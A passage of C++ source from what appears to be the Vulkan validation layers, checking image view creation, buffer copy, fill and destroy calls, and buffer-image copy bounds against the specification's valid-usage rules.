string_VkImageType(image_type)); } else if ((image_flags & (VK_IMAGE_CREATE_SPARSE_BINDING_BIT | VK_IMAGE_CREATE_SPARSE_RESIDENCY_BIT | VK_IMAGE_CREATE_SPARSE_ALIASED_BIT))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021", "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s " "when the VK_IMAGE_CREATE_SPARSE_BINDING_BIT, VK_IMAGE_CREATE_SPARSE_RESIDENCY_BIT, or " "VK_IMAGE_CREATE_SPARSE_ALIASED_BIT flags are enabled.", string_VkImageViewType(view_type), string_VkImageType(image_type)); } } else { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021", "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.", string_VkImageViewType(view_type), string_VkImageType(image_type)); } } } else { if (view_type != VK_IMAGE_VIEW_TYPE_3D) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-subResourceRange-01021", "vkCreateImageView(): pCreateInfo->viewType %s is not compatible with image type %s.", string_VkImageViewType(view_type), string_VkImageType(image_type)); } } break; default: break; } // External format checks needed when VK_ANDROID_external_memory_android_hardware_buffer enabled if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) { skip |= ValidateCreateImageViewANDROID(pCreateInfo); } VkFormatProperties format_properties = GetPDFormatProperties(view_format); VkFormatFeatureFlags tiling_features = (image_tiling & VK_IMAGE_TILING_LINEAR) ? format_properties.linearTilingFeatures : format_properties.optimalTilingFeatures; if (tiling_features == 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-None-02273", "vkCreateImageView(): pCreateInfo->format %s with tiling %s has no supported format features on this " "physical device.", string_VkFormat(view_format), string_VkImageTiling(image_tiling)); } else if ((image_usage & VK_IMAGE_USAGE_SAMPLED_BIT) && !(tiling_features & VK_FORMAT_FEATURE_SAMPLED_IMAGE_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02274", "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes " "VK_IMAGE_USAGE_SAMPLED_BIT.", string_VkFormat(view_format), string_VkImageTiling(image_tiling)); } else if ((image_usage & VK_IMAGE_USAGE_STORAGE_BIT) && !(tiling_features & VK_FORMAT_FEATURE_STORAGE_IMAGE_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02275", "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes " "VK_IMAGE_USAGE_STORAGE_BIT.", string_VkFormat(view_format), string_VkImageTiling(image_tiling)); } else if ((image_usage & VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT) && !(tiling_features & VK_FORMAT_FEATURE_COLOR_ATTACHMENT_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02276", "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes " "VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT.", string_VkFormat(view_format), string_VkImageTiling(image_tiling)); } else if ((image_usage & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT) && !(tiling_features & VK_FORMAT_FEATURE_DEPTH_STENCIL_ATTACHMENT_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-usage-02277", "vkCreateImageView(): pCreateInfo->format %s with tiling %s does not support usage that includes " "VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT.", string_VkFormat(view_format), string_VkImageTiling(image_tiling)); } if (image_usage & VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV) { if (view_type != VK_IMAGE_VIEW_TYPE_2D && view_type != VK_IMAGE_VIEW_TYPE_2D_ARRAY) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-02086", "vkCreateImageView() If image was created with usage containing " "VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV, viewType must be " "VK_IMAGE_VIEW_TYPE_2D or VK_IMAGE_VIEW_TYPE_2D_ARRAY."); } if (view_format != VK_FORMAT_R8_UINT) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(pCreateInfo->image), "VUID-VkImageViewCreateInfo-image-02087", "vkCreateImageView() If image was created with usage containing " "VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV, format must be VK_FORMAT_R8_UINT."); } } } return skip; } void CoreChecks::PostCallRecordCreateImageView(VkDevice device, const VkImageViewCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkImageView *pView, VkResult result) { if (result != VK_SUCCESS) return; auto image_view_map = GetImageViewMap(); (*image_view_map)[*pView] = std::unique_ptr<IMAGE_VIEW_STATE>(new IMAGE_VIEW_STATE(*pView, pCreateInfo)); auto image_state = GetImageState(pCreateInfo->image); auto &sub_res_range = (*image_view_map)[*pView].get()->create_info.subresourceRange; sub_res_range.levelCount = ResolveRemainingLevels(&sub_res_range, image_state->createInfo.mipLevels); sub_res_range.layerCount = ResolveRemainingLayers(&sub_res_range, image_state->createInfo.arrayLayers); } bool CoreChecks::PreCallValidateCmdCopyBuffer(VkCommandBuffer commandBuffer, VkBuffer srcBuffer, VkBuffer dstBuffer, uint32_t regionCount, const VkBufferCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_buffer_state = GetBufferState(srcBuffer); auto dst_buffer_state = GetBufferState(dstBuffer); bool skip = false; skip |= ValidateMemoryIsBoundToBuffer(src_buffer_state, "vkCmdCopyBuffer()", "VUID-vkCmdCopyBuffer-srcBuffer-00119"); skip |= ValidateMemoryIsBoundToBuffer(dst_buffer_state, "vkCmdCopyBuffer()", "VUID-vkCmdCopyBuffer-dstBuffer-00121"); // Validate that SRC & DST buffers have correct usage flags set skip |= ValidateBufferUsageFlags(src_buffer_state, VK_BUFFER_USAGE_TRANSFER_SRC_BIT, true, "VUID-vkCmdCopyBuffer-srcBuffer-00118", "vkCmdCopyBuffer()", "VK_BUFFER_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateBufferUsageFlags(dst_buffer_state, VK_BUFFER_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdCopyBuffer-dstBuffer-00120", "vkCmdCopyBuffer()", "VK_BUFFER_USAGE_TRANSFER_DST_BIT"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdCopyBuffer()", VK_QUEUE_TRANSFER_BIT | VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT, "VUID-vkCmdCopyBuffer-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_COPYBUFFER, "vkCmdCopyBuffer()"); skip |= InsideRenderPass(cb_node, "vkCmdCopyBuffer()", "VUID-vkCmdCopyBuffer-renderpass"); return skip; } void CoreChecks::PreCallRecordCmdCopyBuffer(VkCommandBuffer commandBuffer, VkBuffer srcBuffer, VkBuffer dstBuffer, uint32_t regionCount, const VkBufferCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_buffer_state = GetBufferState(srcBuffer); auto dst_buffer_state = GetBufferState(dstBuffer); // Update bindings between buffers and cmd buffer AddCommandBufferBindingBuffer(cb_node, src_buffer_state); AddCommandBufferBindingBuffer(cb_node, dst_buffer_state); } bool CoreChecks::ValidateIdleBuffer(VkBuffer buffer) { bool skip = false; auto buffer_state = GetBufferState(buffer); if (!buffer_state) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer), kVUID_Core_DrawState_DoubleDestroy, "Cannot free buffer %s that has not been allocated.", report_data->FormatHandle(buffer).c_str()); } else { if (buffer_state->in_use.load()) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_BUFFER_EXT, HandleToUint64(buffer), "VUID-vkDestroyBuffer-buffer-00922", "Cannot free buffer %s that is in use by a command buffer.", report_data->FormatHandle(buffer).c_str()); } } return skip; } bool CoreChecks::PreCallValidateDestroyImageView(VkDevice device, VkImageView imageView, const VkAllocationCallbacks *pAllocator) { IMAGE_VIEW_STATE *image_view_state = GetImageViewState(imageView); VK_OBJECT obj_struct = {HandleToUint64(imageView), kVulkanObjectTypeImageView}; bool skip = false; if (image_view_state) { skip |= ValidateObjectNotInUse(image_view_state, obj_struct, "vkDestroyImageView", "VUID-vkDestroyImageView-imageView-01026"); } return skip; } void CoreChecks::PreCallRecordDestroyImageView(VkDevice device, VkImageView imageView, const VkAllocationCallbacks *pAllocator) { IMAGE_VIEW_STATE *image_view_state = GetImageViewState(imageView); if (!image_view_state) return; VK_OBJECT obj_struct = {HandleToUint64(imageView), kVulkanObjectTypeImageView}; // Any bound cmd buffers are now invalid InvalidateCommandBuffers(image_view_state->cb_bindings, obj_struct); (*GetImageViewMap()).erase(imageView); } bool CoreChecks::PreCallValidateDestroyBuffer(VkDevice device, VkBuffer buffer, const VkAllocationCallbacks *pAllocator) { auto buffer_state = GetBufferState(buffer); bool skip = false; if (buffer_state) { skip |= ValidateIdleBuffer(buffer); } return skip; } void CoreChecks::PreCallRecordDestroyBuffer(VkDevice device, VkBuffer buffer, const VkAllocationCallbacks *pAllocator) { if (!buffer) return; auto buffer_state = GetBufferState(buffer); VK_OBJECT obj_struct = {HandleToUint64(buffer), kVulkanObjectTypeBuffer}; InvalidateCommandBuffers(buffer_state->cb_bindings, obj_struct); for (auto mem_binding : buffer_state->GetBoundMemory()) { auto mem_info = GetMemObjInfo(mem_binding); if (mem_info) { RemoveBufferMemoryRange(HandleToUint64(buffer), mem_info); } } ClearMemoryObjectBindings(HandleToUint64(buffer), kVulkanObjectTypeBuffer); EraseQFOReleaseBarriers<VkBufferMemoryBarrier>(buffer); GetBufferMap()->erase(buffer_state->buffer); } bool CoreChecks::PreCallValidateDestroyBufferView(VkDevice device, VkBufferView bufferView, const VkAllocationCallbacks *pAllocator) { auto buffer_view_state = GetBufferViewState(bufferView); VK_OBJECT obj_struct = {HandleToUint64(bufferView), kVulkanObjectTypeBufferView}; bool skip = false; if (buffer_view_state) { skip |= ValidateObjectNotInUse(buffer_view_state, obj_struct, "vkDestroyBufferView", "VUID-vkDestroyBufferView-bufferView-00936"); } return skip; } void CoreChecks::PreCallRecordDestroyBufferView(VkDevice device, VkBufferView bufferView, const VkAllocationCallbacks *pAllocator) { if (!bufferView) return; auto buffer_view_state = GetBufferViewState(bufferView); VK_OBJECT obj_struct = {HandleToUint64(bufferView), kVulkanObjectTypeBufferView}; // Any bound cmd buffers are now invalid InvalidateCommandBuffers(buffer_view_state->cb_bindings, obj_struct); GetBufferViewMap()->erase(bufferView); } bool CoreChecks::PreCallValidateCmdFillBuffer(VkCommandBuffer commandBuffer, VkBuffer dstBuffer, VkDeviceSize dstOffset, VkDeviceSize size, uint32_t data) { auto cb_node = GetCBNode(commandBuffer); auto buffer_state = GetBufferState(dstBuffer); bool skip = false; skip |= ValidateMemoryIsBoundToBuffer(buffer_state, "vkCmdFillBuffer()", "VUID-vkCmdFillBuffer-dstBuffer-00031"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdFillBuffer()", VK_QUEUE_TRANSFER_BIT | VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT, "VUID-vkCmdFillBuffer-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_FILLBUFFER, "vkCmdFillBuffer()"); // Validate that DST buffer has correct usage flags set skip |= ValidateBufferUsageFlags(buffer_state, VK_BUFFER_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdFillBuffer-dstBuffer-00029", "vkCmdFillBuffer()", "VK_BUFFER_USAGE_TRANSFER_DST_BIT"); skip |= InsideRenderPass(cb_node, "vkCmdFillBuffer()", "VUID-vkCmdFillBuffer-renderpass"); return skip; } void CoreChecks::PreCallRecordCmdFillBuffer(VkCommandBuffer commandBuffer, VkBuffer dstBuffer, VkDeviceSize dstOffset, VkDeviceSize size, uint32_t data) { auto cb_node = GetCBNode(commandBuffer); auto buffer_state = GetBufferState(dstBuffer); // Update bindings between buffer and cmd buffer AddCommandBufferBindingBuffer(cb_node, buffer_state); } bool CoreChecks::ValidateBufferImageCopyData(uint32_t regionCount, const VkBufferImageCopy *pRegions, IMAGE_STATE *image_state, const char *function) { bool skip = false; for (uint32_t i = 0; i < regionCount; i++) { if (image_state->createInfo.imageType == VK_IMAGE_TYPE_1D) { if ((pRegions[i].imageOffset.y != 0) || (pRegions[i].imageExtent.height != 1)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-srcImage-00199", "%s(): pRegion[%d] imageOffset.y is %d and imageExtent.height is %d. For 1D images these must be 0 " "and 1, respectively.", function, i, pRegions[i].imageOffset.y, pRegions[i].imageExtent.height); } } if ((image_state->createInfo.imageType == VK_IMAGE_TYPE_1D) || (image_state->createInfo.imageType == VK_IMAGE_TYPE_2D)) { if ((pRegions[i].imageOffset.z != 0) || (pRegions[i].imageExtent.depth != 1)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-srcImage-00201", "%s(): pRegion[%d] imageOffset.z is %d and imageExtent.depth is %d. For 1D and 2D images these " "must be 0 and 1, respectively.", function, i, pRegions[i].imageOffset.z, pRegions[i].imageExtent.depth); } } if (image_state->createInfo.imageType == VK_IMAGE_TYPE_3D) { if ((0 != pRegions[i].imageSubresource.baseArrayLayer) || (1 != pRegions[i].imageSubresource.layerCount)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-baseArrayLayer-00213", "%s(): pRegion[%d] imageSubresource.baseArrayLayer is %d and imageSubresource.layerCount is %d. " "For 3D images these must be 0 and 1, respectively.", function, i, pRegions[i].imageSubresource.baseArrayLayer, pRegions[i].imageSubresource.layerCount); } } // If the the calling command's VkImage parameter's format is not a depth/stencil format, // then bufferOffset must be a multiple of the calling command's VkImage parameter's element size uint32_t element_size = FormatElementSize(image_state->createInfo.format, pRegions[i].imageSubresource.aspectMask); if (!FormatIsDepthAndStencil(image_state->createInfo.format) && SafeModulo(pRegions[i].bufferOffset, element_size) != 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferOffset-00193", "%s(): pRegion[%d] bufferOffset 0x%" PRIxLEAST64 " must be a multiple of this format's texel size (%" PRIu32 ").", function, i, pRegions[i].bufferOffset, element_size); } // BufferOffset must be a multiple of 4 if (SafeModulo(pRegions[i].bufferOffset, 4) != 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferOffset-00194", "%s(): pRegion[%d] bufferOffset 0x%" PRIxLEAST64 " must be a multiple of 4.", function, i, pRegions[i].bufferOffset); } // BufferRowLength must be 0, or greater than or equal to the width member of imageExtent if ((pRegions[i].bufferRowLength != 0) && (pRegions[i].bufferRowLength < pRegions[i].imageExtent.width)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferRowLength-00195", "%s(): pRegion[%d] bufferRowLength (%d) must be zero or greater-than-or-equal-to imageExtent.width (%d).", function, i, pRegions[i].bufferRowLength, pRegions[i].imageExtent.width); } // BufferImageHeight must be 0, or greater than or equal to the height member of imageExtent if ((pRegions[i].bufferImageHeight != 0) && (pRegions[i].bufferImageHeight < pRegions[i].imageExtent.height)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferImageHeight-00196", "%s(): pRegion[%d] bufferImageHeight (%d) must be zero or greater-than-or-equal-to imageExtent.height (%d).", function, i, pRegions[i].bufferImageHeight, pRegions[i].imageExtent.height); } // subresource aspectMask must have exactly 1 bit set const int num_bits = sizeof(VkFlags) * CHAR_BIT; std::bitset<num_bits> aspect_mask_bits(pRegions[i].imageSubresource.aspectMask); if (aspect_mask_bits.count() != 1) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-aspectMask-00212", "%s: aspectMasks for imageSubresource in each region must have only a single bit set.", function); } // image subresource aspect bit must match format if (!VerifyAspectsPresent(pRegions[i].imageSubresource.aspectMask, image_state->createInfo.format)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-aspectMask-00211", "%s(): pRegion[%d] subresource aspectMask 0x%x specifies aspects that are not present in image format 0x%x.", function, i, pRegions[i].imageSubresource.aspectMask, image_state->createInfo.format); } // Checks that apply only to compressed images if (FormatIsCompressed(image_state->createInfo.format) || FormatIsSinglePlane_422(image_state->createInfo.format)) { auto block_size = FormatTexelBlockExtent(image_state->createInfo.format); // BufferRowLength must be a multiple of block width if (SafeModulo(pRegions[i].bufferRowLength, block_size.width) != 0) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferRowLength-00203", "%s(): pRegion[%d] bufferRowLength (%d) must be a multiple of the compressed image's texel width (%d)..", function, i, pRegions[i].bufferRowLength, block_size.width); } // BufferRowHeight must be a multiple of block height if (SafeModulo(pRegions[i].bufferImageHeight, block_size.height) != 0) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferImageHeight-00204", "%s(): pRegion[%d] bufferImageHeight (%d) must be a multiple of the compressed image's texel height (%d)..", function, i, pRegions[i].bufferImageHeight, block_size.height); } // image offsets must be multiples of block dimensions if ((SafeModulo(pRegions[i].imageOffset.x, block_size.width) != 0) || (SafeModulo(pRegions[i].imageOffset.y, block_size.height) != 0) || (SafeModulo(pRegions[i].imageOffset.z, block_size.depth) != 0)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageOffset-00205", "%s(): pRegion[%d] imageOffset(x,y) (%d, %d) must be multiples of the compressed image's texel " "width & height (%d, %d)..", function, i, pRegions[i].imageOffset.x, pRegions[i].imageOffset.y, block_size.width, block_size.height); } // bufferOffset must be a multiple of block size (linear bytes) uint32_t block_size_in_bytes = FormatElementSize(image_state->createInfo.format); if (SafeModulo(pRegions[i].bufferOffset, block_size_in_bytes) != 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-bufferOffset-00206", "%s(): pRegion[%d] bufferOffset (0x%" PRIxLEAST64 ") must be a multiple of the compressed image's texel block size (%" PRIu32 ")..", function, i, pRegions[i].bufferOffset, block_size_in_bytes); } // imageExtent width must be a multiple of block width, or extent+offset width must equal subresource width VkExtent3D mip_extent = GetImageSubresourceExtent(image_state, &(pRegions[i].imageSubresource)); if ((SafeModulo(pRegions[i].imageExtent.width, block_size.width) != 0) && (pRegions[i].imageExtent.width + pRegions[i].imageOffset.x != mip_extent.width)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageExtent-00207", "%s(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block width " "(%d), or when added to offset.x (%d) must equal the image subresource width (%d)..", function, i, pRegions[i].imageExtent.width, block_size.width, pRegions[i].imageOffset.x, mip_extent.width); } // imageExtent height must be a multiple of block height, or extent+offset height must equal subresource height if ((SafeModulo(pRegions[i].imageExtent.height, block_size.height) != 0) && (pRegions[i].imageExtent.height + pRegions[i].imageOffset.y != mip_extent.height)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageExtent-00208", "%s(): pRegion[%d] extent height (%d) must be a multiple of the compressed texture block height " "(%d), or when added to offset.y (%d) must equal the image subresource height (%d)..", function, i, pRegions[i].imageExtent.height, block_size.height, pRegions[i].imageOffset.y, mip_extent.height); } // imageExtent depth must be a multiple of block depth, or extent+offset depth must equal subresource depth if ((SafeModulo(pRegions[i].imageExtent.depth, block_size.depth) != 0) && (pRegions[i].imageExtent.depth + pRegions[i].imageOffset.z != mip_extent.depth)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-VkBufferImageCopy-imageExtent-00209", "%s(): pRegion[%d] extent width (%d) must be a multiple of the compressed texture block depth " "(%d), or when added to offset.z (%d) must equal the image subresource depth (%d)..", function, i, pRegions[i].imageExtent.depth, block_size.depth, pRegions[i].imageOffset.z, mip_extent.depth); } } } return skip; } static bool ValidateImageBounds(const debug_report_data *report_data, const IMAGE_STATE *image_state, const uint32_t regionCount, const VkBufferImageCopy *pRegions, const char *func_name, const char *msg_code) { bool skip = false; const VkImageCreateInfo *image_info = &(image_state->createInfo); for (uint32_t i = 0; i < regionCount; i++) { VkExtent3D extent = pRegions[i].imageExtent; VkOffset3D offset = pRegions[i].imageOffset; if (IsExtentSizeZero(&extent)) // Warn on zero area subresource { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, (uint64_t)0, kVUID_Core_Image_ZeroAreaSubregion, "%s: pRegion[%d] imageExtent of {%1d, %1d, %1d} has zero area", func_name, i, extent.width, extent.height, extent.depth); } VkExtent3D image_extent = GetImageSubresourceExtent(image_state, &(pRegions[i].imageSubresource)); // If we're using a compressed format, valid extent is rounded up to multiple of block size (per 18.1) if (FormatIsCompressed(image_info->format)) { auto block_extent = FormatTexelBlockExtent(image_info->format); if (image_extent.width % block_extent.width) { image_extent.width += (block_extent.width - (image_extent.width % block_extent.width)); } if (image_extent.height % block_extent.height) { image_extent.height += (block_extent.height - (image_extent.height % block_extent.height)); } if (image_extent.depth % block_extent.depth) { image_extent.depth += (block_extent.depth - (image_extent.depth % block_extent.depth)); } } if (0 != ExceedsBounds(&offset, &extent, &image_extent)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, (uint64_t)0, msg_code, "%s: pRegion[%d] exceeds image bounds..", func_name, i); } } return skip; } static inline bool ValidateBufferBounds(const debug_report_data *report_data, IMAGE_STATE *image_state, BUFFER_STATE *buff_state, uint32_t regionCount, const VkBufferImageCopy *pRegions, const char *func_name, const char *msg_code) { bool skip = false; VkDeviceSize buffer_size = buff_state->createInfo.size; for (uint32_t i = 0; i < regionCount; i++) { VkExtent3D copy_extent = pRegions[i].imageExtent; VkDeviceSize buffer_width = (0 == pRegions[i].bufferRowLength ? copy_extent.width : pRegions[i].bufferRowLength); VkDeviceSize buffer_height = (0 == pRegions[i].bufferImageHeight ? copy_extent.height : pRegions[i].bufferImageHeight); VkDeviceSize unit_size = FormatElementSize(image_state->createInfo.format, pRegions[i].imageSubresource.aspectMask); // size (bytes) of texel or block if (FormatIsCompressed(image_state->createInfo.format) || FormatIsSinglePlane_422(image_state->createInfo.format)) { // Switch to texel block units, rounding up for any partially-used blocks auto block_dim = FormatTexelBlockExtent(image_state->createInfo.format); buffer_width = (buffer_width + block_dim.width - 1) / block_dim.width; buffer_height = (buffer_height + block_dim.height - 1) / block_dim.height; copy_extent.width = (copy_extent.width + block_dim.width - 1) / block_dim.width; copy_extent.height = (copy_extent.height + block_dim.height - 1) / block_dim.height; copy_extent.depth = (copy_extent.depth + block_dim.depth - 1) / block_dim.depth; } // Either depth or layerCount may be greater than 1 (not both). This is the number of 'slices' to copy uint32_t z_copies = std::max(copy_extent.depth, pRegions[i].imageSubresource.layerCount); if (IsExtentSizeZero(&copy_extent) || (0 == z_copies)) { // TODO: Issue warning here? Already warned in ValidateImageBounds()... } else { // Calculate buffer offset of final copied byte, + 1. VkDeviceSize max_buffer_offset = (z_copies - 1) * buffer_height * buffer_width; // offset to slice max_buffer_offset += ((copy_extent.height - 1) * buffer_width) + copy_extent.width; // add row,col max_buffer_offset *= unit_size; // convert to bytes max_buffer_offset += pRegions[i].bufferOffset; // add initial offset (bytes) if (buffer_size < max_buffer_offset) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, (uint64_t)0, msg_code, "%s: pRegion[%d] exceeds buffer size of %" PRIu64 " bytes..", func_name, i, buffer_size); } } } return skip; } bool CoreChecks::PreCallValidateCmdCopyImageToBuffer(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkBuffer dstBuffer, uint32_t regionCount, const VkBufferImageCopy *pRegions) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_buffer_state = GetBufferState(dstBuffer); bool skip = ValidateBufferImageCopyData(regionCount, pRegions, src_image_state, "vkCmdCopyImageToBuffer"); // Validate command buffer state skip |= ValidateCmd(cb_node, CMD_COPYIMAGETOBUFFER, "vkCmdCopyImageToBuffer()"); // Command pool must support graphics, compute, or transfer operations auto pPool = GetCommandPoolNode(cb_node->createInfo.commandPool); VkQueueFlags queue_flags = GetPhysicalDeviceState()->queue_family_properties[pPool->queueFamilyIndex].queueFlags; if (0 == (queue_flags & (VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT | VK_QUEUE_TRANSFER_BIT))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->createInfo.commandPool), "VUID-vkCmdCopyImageToBuffer-commandBuffer-cmdpool", "Cannot call vkCmdCopyImageToBuffer() on a command buffer allocated from a pool without graphics, compute, " "or transfer capabilities.."); } skip |= ValidateImageBounds(report_data, src_image_state, regionCount, pRegions, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-pRegions-00182"); skip |= ValidateBufferBounds(report_data, src_image_state, dst_buffer_state, regionCount, pRegions, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-pRegions-00183"); skip |= ValidateImageSampleCount(src_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdCopyImageToBuffer(): srcImage", "VUID-vkCmdCopyImageToBuffer-srcImage-00188"); skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-srcImage-00187"); skip |= ValidateMemoryIsBoundToBuffer(dst_buffer_state, "vkCmdCopyImageToBuffer()", "VUID-vkCmdCopyImageToBuffer-dstBuffer-00192"); // Validate that SRC image & DST buffer have correct usage flags 